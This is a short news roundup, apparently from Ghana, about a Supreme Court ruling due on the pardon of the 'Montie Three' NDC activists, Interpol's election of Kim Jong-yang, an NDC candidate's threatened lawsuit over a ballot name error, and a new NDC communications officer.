The Supreme Court will Wednesday deliver its judgement on a case challenging the Presidential Pardon granted a radio show host and his two panellists. The three could end up in jail to serve the remainder of their term if the Supreme Court grants the reliefs being sought by the petitioners. The seven-member panel presided over by Justice Sophia Adinyira will determine the constitutionality of the pardon granted by former President John Mahama to three National Democratic Congress (NDC) activists who threatened Supreme Court justices on radio and later came to be known as the Montie Three. Interpol has elected South Korean Kim Jong-yang as its president, rejecting the Russian frontrunner who had been accused of abusing the international police body's arrest warrant system. An aspiring Deputy General Secretary in the just-ended NDC National Executive Elections Kojo Adu-Asare has threatened to sue the party. Kojo Adu-Asare’s threat comes as a result of his name changed to Justice Yeboah on the ballot paper. He attributed his inability to win to the name change and for that has vowed to sue the party. Sammy Gyamfi is the new Communications Officer for the Opposition National Democratic Congress (NDC).
